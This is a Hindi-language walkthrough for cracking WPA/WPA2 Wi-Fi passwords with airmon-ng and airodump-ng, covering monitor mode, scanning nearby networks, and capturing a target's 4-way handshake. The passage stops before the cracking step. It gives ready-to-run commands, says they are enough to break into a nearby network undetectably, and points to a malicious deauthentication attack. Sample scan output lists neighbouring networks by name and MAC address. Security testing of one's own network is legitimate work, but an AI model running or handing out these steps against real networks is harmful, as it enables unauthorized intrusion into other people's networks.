
Airodump-ng और Aircrack-ng/Hashcat के साथ WPA/WPA2 वाई-फाई राउटर को क्रैक करें
WPA/WPA2 वाई-फाई राउटर को Airodump-ng और Aircrack-ng/Hashcat से क्रैक करें।
यह एक संक्षिप्त वॉक-थ्रू ट्यूटोरियल है जो दर्शाता है कि कमजोर पासवर्ड वाले वाई-फाई नेटवर्क को कैसे क्रैक किया जाए। यह विस्तृत नहीं है, लेकिन यह आपके अपने नेटवर्क की सुरक्षा का परीक्षण करने या आस-पास के किसी नेटवर्क में घुसपैठ करने के लिए पर्याप्त जानकारी होनी चाहिए। नीचे बताया गया हमला पूरी तरह से निष्क्रिय है (केवल सुनना, आपके कंप्यूटर से कुछ प्रसारित नहीं होता) और इसका पता लगाना असंभव है, बशर्ते कि आप वास्तव में उस पासवर्ड का उपयोग न करें जिसे आप क्रैक करते हैं। एक वैकल्पिक सक्रिय डीऑथेंटिकेशन हमले का उपयोग टोही प्रक्रिया को तेज करने के लिए किया जा सकता है, जिसका वर्णन इस दस्तावेज़ के अंत में किया गया है।
यदि आप इस प्रक्रिया से परिचित हैं, तो आप विवरण छोड़ सकते हैं और सीधे नीचे उपयोग किए गए कमांड की सूची पर जा सकते हैं। विभिन्न सुझावों और वैकल्पिक तरीकों के लिए, परिशिष्ट देखें। neal1991 और tiiime ने भी कृपया इस दस्तावेज़ और परिशिष्ट का चीनी में अनुवाद प्रदान किया है यदि आप उन संस्करणों को पसंद करते हैं।
अस्वीकरण: यह सॉफ्टवेयर/ट्यूटोरियल केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग अवैध गतिविधि के लिए नहीं किया जाना चाहिए। लेखक इसके उपयोग के लिए जिम्मेदार नहीं है। बदमाश मत बनो।
यह ट्यूटोरियल मानता है कि आप:
sudo apt-get install aircrack-ngमॉनिटर मोड का समर्थन करने वाले वायरलेस इंटरफेस को सूचीबद्ध करके शुरू करें:
airmon-ng
यदि आपको कोई इंटरफ़ेस सूचीबद्ध नहीं दिखता है, तो आपका वायरलेस कार्ड मॉनिटर मोड का समर्थन नहीं करता है 😞
हम मान लेंगे कि आपका वायरलेस इंटरफ़ेस नाम wlan0 है, लेकिन यदि यह इससे भिन्न है तो सही नाम का उपयोग करना सुनिश्चित करें। इसके बाद, हम इंटरफ़ेस को मॉनिटर मोड में रखेंगे:
airmon-ng start wlan0
iwconfig चलाएँ। अब आपको एक नया मॉनिटर मोड इंटरफ़ेस सूचीबद्ध दिखना चाहिए (संभवतः mon0 या wlan0mon)।
अपने मॉनिटर इंटरफ़ेस का उपयोग करके आस-पास के वायरलेस राउटर द्वारा प्रसारित 802.11 बीकन फ्रेम को सुनना शुरू करें:
airodump-ng mon0
आपको नीचे दिए गए समान आउटपुट दिखना चाहिए।
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
इस डेमो के प्रयोजनों के लिए, हम अपने नेटवर्क "hackme" का पासवर्ड क्रैक करना चुनेंगे। airodump-ng द्वारा प्रदर्शित BSSID MAC पता और चैनल (CH) संख्या याद रखें, क्योंकि अगले चरण के लिए हमें दोनों की आवश्यकता होगी।
WPA/WPA2 उपकरणों को नेटवर्क से प्रमाणित करने के लिए 4-तरफ़ा हैंडशेक का उपयोग करता है। आपको यह जानने की आवश्यकता नहीं है कि इसका क्या अर्थ है, लेकिन नेटवर्क पासवर्ड क्रैक करने के लिए आपको इनमें से एक हैंडशेक को कैप्चर करना होगा। ये हैंडशेक तब होते हैं जब कोई उपकरण नेटवर्क से कनेक्ट होता है, उदाहरण के लिए, जब आपका पड़ोसी काम से घर लौटता है। हम पिछले कमांड से प्राप्त चैनल और बीएसएसआईडी मानों का उपयोग करके लक्ष्य नेटवर्क पर ट्रैफ़िक की निगरानी के लिए airmon-ng को निर्देशित करके इस हैंडशेक को कैप्चर करते हैं।
# -c और --bssid मानों को अपने लक्ष्य नेटवर्क के मानों से बदलें
# -w उस निर्देशिका को निर्दिष्ट करता है जहाँ हम पैकेट कैप्चर को सहेजेंगे
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
अब हम प्रतीक्षा करते हैं... एक बार जब आप एक हैंडशेक कैप्चर कर लेते हैं, तो आपको स्क्रीन के ऊपरी दाएं भाग में, वर्तमान समय के ठीक दाईं ओर कुछ इस तरह दिखना चाहिए [ WPA handshake: bc:d3:c9:ef:d2:67।
यदि आप अधीर महसूस कर रहे हैं, और सक्रिय हमले का उपयोग करने में सहज हैं, तो आप लक्ष्य नेटवर्क से जुड़े उपकरणों पर दुर्भावनापूर्ण डीऑथेंटिकेशन पैकेट भेजकर उन्हें पुनः कनेक्ट करने के लिए मजबूर कर सकते हैं। इसके परिणामस्वरूप अक्सर 4-तरफ़ा हैंडशेक कैप्चर हो जाता है। इसके बारे में जानकारी के लिए नीचे deauth attack section देखें।
एक बार जब आप एक हैंडशेक कैप्चर कर लेते हैं, तो airodump-ng से बाहर निकलने के लिए ctrl-c दबाएँ। आपको एक .cap फ़ाइल दिखनी चाहिए जहाँ भी आपने airodump-ng को कैप्चर सहेजने के लिए कहा था (संभवतः -01.cap कहा जाता है)। हम नेटवर्क पासवर्ड क्रैक करने के लिए इस कैप्चर फ़ाइल का उपयोग करेंगे। मैं इस फ़ाइल का नाम बदलकर उस नेटवर्क नाम को दर्शाना पसंद करता हूँ जिसे हम क्रैक करने का प्रयास कर रहे हैं:
mv ./-01.cap hackme.cap